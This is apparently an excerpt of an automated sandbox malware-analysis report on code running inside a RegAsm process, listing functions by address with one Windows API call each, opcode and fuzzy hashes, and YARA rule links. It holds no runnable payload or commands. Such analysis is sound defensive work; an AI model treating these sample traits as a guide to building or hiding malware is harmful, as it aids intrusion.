Instruction ID: 1d3b4d8867f45e44eea843403abe55420567d9a07f30cd3363504e98d6fbb233
Opcode Fuzzy Hash: 717ef74fb83bd1fe42c4f177f300345dce4a9d4e887c3e7854b5c674193d0360
Instruction Fuzzy Hash: 0751BDB1D00309DFDB14CFA9C984ADEBBB5FF48314F60852AE819AB210D775A885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0094666C, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 7c04d819a682eec0f0108e10d832ad7c85ed7f9ae75c4e64907ce32ee3369f80
Instruction ID: e8911d89ec12b3f6632368572307126e4e3c56117edde374b899a52e94f7ac4a
Opcode Fuzzy Hash: 7c04d819a682eec0f0108e10d832ad7c85ed7f9ae75c4e64907ce32ee3369f80
Instruction Fuzzy Hash: 9F3194F2E0470ADEDB295E10894DFA0BBA4BF1332AF7909A9C85106151E33999E4DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00946560, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccaea00e1e69481d96ff93c0d8a4daff61a0a1aa6c99d172a278cc9024e522ad
Instruction ID: 84796a5b613baaf375a502203dc557846d880ad68626b4d516091393d9ed18f9
Opcode Fuzzy Hash: ccaea00e1e69481d96ff93c0d8a4daff61a0a1aa6c99d172a278cc9024e522ad
Instruction Fuzzy Hash: 2931A6F1A08309DEEF385E10C858FF437A5AF53328FAA0A6AD80246190D33898D4DB43

Uniqueness

Uniqueness Score: -1.00%

Function 009430B6, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00943070,0094310B), ref: 009430D8

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 358f9cf4e2a1fa2bd14ebb3a650c4fd4bb1b75bbc98b5f7d3781ee70ddc4b0f7
Instruction ID: c51fe113bfdcc8dee7d662b07556ad8ddf9a024a579256009684b47b2ca5f01c
Opcode Fuzzy Hash: 358f9cf4e2a1fa2bd14ebb3a650c4fd4bb1b75bbc98b5f7d3781ee70ddc4b0f7
Instruction Fuzzy Hash: 4B21BEB150C701AECB248A348DC6FB9B355FF1E371F30C654E8528B153D3A9DB828969

Uniqueness

Uniqueness Score: -1.00%

Function 0094657C, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 1d2b3b659df63cc12f6d2f92c946e2a96161cea0a1d6b7f8d410c0816fc15ed4
Instruction ID: 517d425e3465226219d877017f2c1d2b363f7398f25c850a60b7e20dc0e84c5e
Opcode Fuzzy Hash: 1d2b3b659df63cc12f6d2f92c946e2a96161cea0a1d6b7f8d410c0816fc15ed4
Instruction Fuzzy Hash: 5231A7F1A08305DEEF395A10C858FB437A1EF13329F6A4A6AC80246294D33898C4DB43

Uniqueness

Uniqueness Score: -1.00%

Function 009466A8, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 39eeb9493f5df4e1c7169d77a6e29ace5de429bd713a59114d727c0c0cbf6c00
Instruction ID: 85e9b89fb92567300973088f9967d2683cd9eb6db529c484d84382b6996d4bc9
Opcode Fuzzy Hash: 39eeb9493f5df4e1c7169d77a6e29ace5de429bd713a59114d727c0c0cbf6c00
Instruction Fuzzy Hash: 4731D5F1D0430ACEDB259E108549FA07BA5BF1332EF7909A9C95106121F33999E8D753

Uniqueness

Uniqueness Score: -1.00%

Function 009465CC, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e788485755d63f0236ac53d550a05d17968df2b4be71476e0220b0958d8f344c
Instruction ID: 04157ab093b854918b769fbd49929846adad51f512eacfec766e955df9ef50e1
Opcode Fuzzy Hash: e788485755d63f0236ac53d550a05d17968df2b4be71476e0220b0958d8f344c
Instruction Fuzzy Hash: 9131C5F1A08709DEEF355E108818FF477A1FF13329FAA0A5AC85207290E33888D49B43

Uniqueness

Uniqueness Score: -1.00%

Function 009465F0, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8ec90c3c7d2a433fed0b4199b3be05d12641d86af76f651ab9aaa309043f941b
Instruction ID: 45c35eb8007bc691c0eac5ffdd796085263045d90602512b095489517eca0f73
Opcode Fuzzy Hash: 8ec90c3c7d2a433fed0b4199b3be05d12641d86af76f651ab9aaa309043f941b
Instruction Fuzzy Hash: 502195F1E08309DEEF395E10C85CFB437A1EB13329FBA1A5AC85246190E37888D49B03

Uniqueness

Uniqueness Score: -1.00%

Function 009449B0, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8e45323d69534f8f465573fc2be3c18097063ec7ca53e63beb5857be5f4225ac
Instruction ID: 94da8e84b6ea97692d89509181bf653005516b655934818820fe88ab5e2fe603
Opcode Fuzzy Hash: 8e45323d69534f8f465573fc2be3c18097063ec7ca53e63beb5857be5f4225ac
Instruction Fuzzy Hash: 15115CA4CC4405EECF21AD904E42FBDB369FE50312F380E69E49246401E32DC5A4678F

Uniqueness

Uniqueness Score: -1.00%

Function 1D407C6E, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1D407D01

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: fc56b576d78b1349d2d9fa26ef3f68ebe0479ecc355e1db83342fbdcd5e895b7
Instruction ID: b77b06b94226eaa3f2b56bbb425d691d3f054f9a11ed78a0fc70b3e660834b0e
Opcode Fuzzy Hash: fc56b576d78b1349d2d9fa26ef3f68ebe0479ecc355e1db83342fbdcd5e895b7
Instruction Fuzzy Hash: 093158B4A00245CFDB04CF98C488EAABBF5FF89314F24C469D419AB321D735A845CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00941F1A, Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00941F4A

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 6fcb2ff496fb2bd16679d76299d08e8007849caac7f983af46f631818e75cb33
Instruction ID: b7675f4d580636abad9e93b1ef2e8e3d95676cb0869ad17f4cdb02de498e543b
Opcode Fuzzy Hash: 6fcb2ff496fb2bd16679d76299d08e8007849caac7f983af46f631818e75cb33
Instruction Fuzzy Hash: 05215CB4108301AFD7208A68CDD6FE93256EF4E3B0F71C691EC62871D2D3A5C9C69516

Uniqueness

Uniqueness Score: -1.00%

Function 00946686, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2123bbe0ec1d23ea234f54c8e7f4a6200ad8f1a6d6962931e60eadb59144d61f
Instruction ID: e4009fb4a0fd9637ee3243d793c1b0318812c68252be8ca5a15ab62b4609a8d7
Opcode Fuzzy Hash: 2123bbe0ec1d23ea234f54c8e7f4a6200ad8f1a6d6962931e60eadb59144d61f
Instruction Fuzzy Hash: DC21D6F1A0830ACEEF355E108418FB437A5EF13328FAA0A9AC81247161E33888D5D753

Uniqueness

Uniqueness Score: -1.00%

Function 009443DB, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c51ec60bab96ce87298bdfbdc6c83ffb8a59012add4847d271ebd36ab5af7e66
Instruction ID: 51a8e0532b3393f2ed14dbf173082cbb188a3b46141053c68a820e0546c998cf
Opcode Fuzzy Hash: c51ec60bab96ce87298bdfbdc6c83ffb8a59012add4847d271ebd36ab5af7e66
Instruction Fuzzy Hash: B4113AB2908101AFEF24AE20CD47FB67BE8FFA2311F594949F58787126F3295C509712

Uniqueness

Uniqueness Score: -1.00%

Function 1D406D73, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1D406D3E,?,?,?,?,?), ref: 1D406DFF

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f004611f833d96cc66d3657adf4a0c8e4a68c2ed4072972d669dc77b79b2601a
Instruction ID: 4f49b8c11d3c692445bed6cffb171dd322ff7fc762437c8fddff7402a913cc0d
Opcode Fuzzy Hash: f004611f833d96cc66d3657adf4a0c8e4a68c2ed4072972d669dc77b79b2601a
Instruction Fuzzy Hash: 8721D2B59002089FDB10CFA9D585ADEBBF4FB48324F14842AE915A7710D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D406718, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1D406D3E,?,?,?,?,?), ref: 1D406DFF

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 27c6341204be1e2ce4fcf2e7bb2df738f3df1ab7ebec56ecc82c3b74c391ceb7
Instruction ID: 427ba1791a02afce7f5dfb3ba8935f26bffc1454e3b3c8d0945f62524dc70e43
Opcode Fuzzy Hash: 27c6341204be1e2ce4fcf2e7bb2df738f3df1ab7ebec56ecc82c3b74c391ceb7
Instruction Fuzzy Hash: EA2114B5900308DFDB10CFA9D484AEEBBF4FB48320F20802AE915A7310D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00944A47, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14d156b43644bc9c471e3b6307be58cd49c5d3abd632fd4eca29193b4840a798
Instruction ID: 906181cf4003288cf1001fe1f6f91650d3d0a46367f8d5fcdcf2eb4e3e3ef819
Opcode Fuzzy Hash: 14d156b43644bc9c471e3b6307be58cd49c5d3abd632fd4eca29193b4840a798
Instruction Fuzzy Hash: 0D016D7998450ADFCF11AD804D46FADF3A9FD143137780D26E99357501D32CC074AB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00944AC2, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 05ceea6b615be07ac7dec0737e249503f9f1e89d16c0887045e70dfffdc9c229
Instruction ID: c19de00ef5c70bf4877aa285104ecb015b79779be66e97af85e64025bfa5b15b
Opcode Fuzzy Hash: 05ceea6b615be07ac7dec0737e249503f9f1e89d16c0887045e70dfffdc9c229
Instruction Fuzzy Hash: C301F465E4080D8BCE142D400E87FACF3F5FD15327B780EA4C59257904D22ED5A56785

Uniqueness

Uniqueness Score: -1.00%

Function 1D40BDF8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1D40BE72

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: edbd158057545fd8d149f40708e99ee0ff3b242c6886aeae44ef28ad381400b6
Instruction ID: 0ef421d46a146c711d0c0ff9373cdf5b727b647ef5d56192734384bbebfb9c80
Opcode Fuzzy Hash: edbd158057545fd8d149f40708e99ee0ff3b242c6886aeae44ef28ad381400b6
Instruction Fuzzy Hash: 881167B19017498FDB10CFA9C548BDEBBF4FB49325F60842AD909A7700C73A6544CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00944A2A, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 52ecab33404bc021c9a14849a638d5b17fa8454c9fef9ca110a0a24617b5a81b
Instruction ID: 222f3a2a9733f57851e9c29785b9d993452d92e70729c90f0b9b796288107ac4
Opcode Fuzzy Hash: 52ecab33404bc021c9a14849a638d5b17fa8454c9fef9ca110a0a24617b5a81b
Instruction Fuzzy Hash: 42F0F6685C4109DBCF207DD14A41FBDA3A9EE91361FB44E26E85346011D72CD0A476CF

Uniqueness

Uniqueness Score: -1.00%

Function 00944A73, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b0fda77df17784410624d7e12f21ec86e955e9090032456f8873a53e6f53cb8
Instruction ID: d26a08f9dbb1c25400b73ba0da4ac730d35c8f1bac58b28e2e95de26227bcc01
Opcode Fuzzy Hash: 6b0fda77df17784410624d7e12f21ec86e955e9090032456f8873a53e6f53cb8
Instruction Fuzzy Hash: 69F022A8D84A0ADEDF112E800E5BFACF6A8FC01323BB40D79D99207100D32E8130A74A

Uniqueness

Uniqueness Score: -1.00%

Function 00944A3D, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92a28ba483709ec807db12a4fd6377a48bfe28630fb03ae8ce1d14fb09241a67
Instruction ID: 898114eb6950578891f6ed475cad309db6ef4e44c1842ba937c099fffff46db1
Opcode Fuzzy Hash: 92a28ba483709ec807db12a4fd6377a48bfe28630fb03ae8ce1d14fb09241a67
Instruction Fuzzy Hash: AEF0E2585C810ADB8F203DE14A91FBD9268CE51311FB44E27E85346041D62CC468268B

Uniqueness

Uniqueness Score: -1.00%

Function 0094675A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 82391d091ad883ff18cb5729b292c57ac62d9a57f12a4f84dfcb45d41377e242
Instruction ID: 96f7809a34d6f8075ae79c91ab0dfabb92a79b69c753e57684dfab3b525d74ef
Opcode Fuzzy Hash: 82391d091ad883ff18cb5729b292c57ac62d9a57f12a4f84dfcb45d41377e242
Instruction Fuzzy Hash: 3DF027F1F18306CEAF3A6E108948FF837B6ED533183AC0E5AC81207620E32458C59383

Uniqueness

Uniqueness Score: -1.00%

Function 00944AA4, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a170a67910ce562ba253494ad4706aa440acb9692fb0199205838b1e4ec04f99
Instruction ID: cc2d48ff81e197035bb7df8043e596120797168e6e8460fb655ba9ba9bbfcb83
Opcode Fuzzy Hash: a170a67910ce562ba253494ad4706aa440acb9692fb0199205838b1e4ec04f99
Instruction Fuzzy Hash: AEF0E278E40106DA8F25AE414E9BFACF364FD10363B78882AD9534B104D33DC430AB45

Uniqueness

Uniqueness Score: -1.00%

Function 0094677C, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a6e462ea324192b81e025fe12afb5ec1ae6325c8468e4f50293dd2afd1c8e6e2
Instruction ID: 2de85c39f4d2b20b93db6d778f97af927985fe459b7490d18af79a91632db8fd
Opcode Fuzzy Hash: a6e462ea324192b81e025fe12afb5ec1ae6325c8468e4f50293dd2afd1c8e6e2
Instruction Fuzzy Hash: 7DF0A7F1F04706DE5F2DAD008A4AFA4B765FD4332A7AD0D6DC99353604E32A58B49783

Uniqueness

Uniqueness Score: -1.00%

Function 0094681F, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 895a231811ce6a063759fa192c89cc0c2fe9e9e5796db8b39c7358d1d3254613
Instruction ID: 020b85e9ad996541d6f0425813ed4f3fe207ca874060c13468bec988bf6e32a4
Opcode Fuzzy Hash: 895a231811ce6a063759fa192c89cc0c2fe9e9e5796db8b39c7358d1d3254613
Instruction Fuzzy Hash: 77E0D8F0A04315D95F2D99148D4EFA87759FD4B316BA40E3DC89302504922E50A59753

Uniqueness

Uniqueness Score: -1.00%

Function 009467A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0d8ee90998177050ebd53cb5ee0a093c4cbb12e72249538bd0485ad3dcf49ba2
Instruction ID: 81701b067c87b39a7b6c2410295ea808a31e32008171bac4b343c4d7949c9bde
Opcode Fuzzy Hash: 0d8ee90998177050ebd53cb5ee0a093c4cbb12e72249538bd0485ad3dcf49ba2
Instruction Fuzzy Hash: 28E026F0A04706CA5F3E6D14C989FA873A6FD833197B80E6EC85312A00D23A50D593D3

Uniqueness

Uniqueness Score: -1.00%

Function 00944330, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: daf1d6391b95ec0964c459abdd9af94b7e14c59028af9b3771f87500f46de380
Instruction ID: 874ff3370e20d53ddf72904a19dd1e3d6e3fbb12930a901f12273b76b075f082
Opcode Fuzzy Hash: daf1d6391b95ec0964c459abdd9af94b7e14c59028af9b3771f87500f46de380
Instruction Fuzzy Hash: 08F0A075908642DFCA50DF009A86FA5B7B8BF54B09F218881DAC787501E72A6875DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00944390, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c8b2a28f40b7a6e03028c23dd388d10441ca330218195fa6e2b7b46faba829a2
Instruction ID: 624800fa87063be0f1d54123912c778989516eccaa2902d73002106485d156e8
Opcode Fuzzy Hash: c8b2a28f40b7a6e03028c23dd388d10441ca330218195fa6e2b7b46faba829a2
Instruction Fuzzy Hash: F0E08675900B06E9DE54D9008F8FFB5F2B8BF24347F704864DAC7D2515D72A28758B21

Uniqueness

Uniqueness Score: -1.00%

Function 009443A8, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 30b54c1f65652cf5b6f80fc06bd5cc6573efc49c0061c385883190ffc59b7bab
Instruction ID: 3116fcfaf394ea549e5942316acb9b134b1806496314119465f7f86f791925c0
Opcode Fuzzy Hash: 30b54c1f65652cf5b6f80fc06bd5cc6573efc49c0061c385883190ffc59b7bab
Instruction Fuzzy Hash: C3E08C70A04604DECA50DE008E8AF7AB2F4BF40B06F214810EA87C3400E33A68749A22

Uniqueness

Uniqueness Score: -1.00%

Function 009443C0, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 063478b0bbec792e30bbaa2ae008d79df262572e711fd7c8a0f09dd076576702
Instruction ID: 4f4576d710d6c2dd4260bff1f307a2053b68aa89d299494c768b3b5eed1e409c
Opcode Fuzzy Hash: 063478b0bbec792e30bbaa2ae008d79df262572e711fd7c8a0f09dd076576702
Instruction Fuzzy Hash: E1D05E70A08201EECAA4CA00CDCAF7AB3A8BF50705F314825EA87C7119C3386C60DB62

Uniqueness

Uniqueness Score: -1.00%

Function 009443A6, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00944411

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 1fb6458cfc1dad55b41e1489582be0ce84cd10770d290491f995e507b984df4b
Instruction ID: 90c17f2badd2951a88da2d9545a6fe03868c64954a36fe3f439d79c8cce6dcbf
Opcode Fuzzy Hash: 1fb6458cfc1dad55b41e1489582be0ce84cd10770d290491f995e507b984df4b
Instruction Fuzzy Hash: 24D0C971208340EADA60DA509E84FBA62E4AB90F44F314C16FE8BC7046D738A854A612

Uniqueness

Uniqueness Score: -1.00%

Function 009449D9, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00944AED

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f97c119e05b6dddb9f4c306fb180b41bf5873e10452bc04fffe5b2f15468c2e3
Instruction ID: dbd2101da23b4b0dffc609d7ec6695e32c481bdeb739157083a6040180d55c3d
Opcode Fuzzy Hash: f97c119e05b6dddb9f4c306fb180b41bf5873e10452bc04fffe5b2f15468c2e3
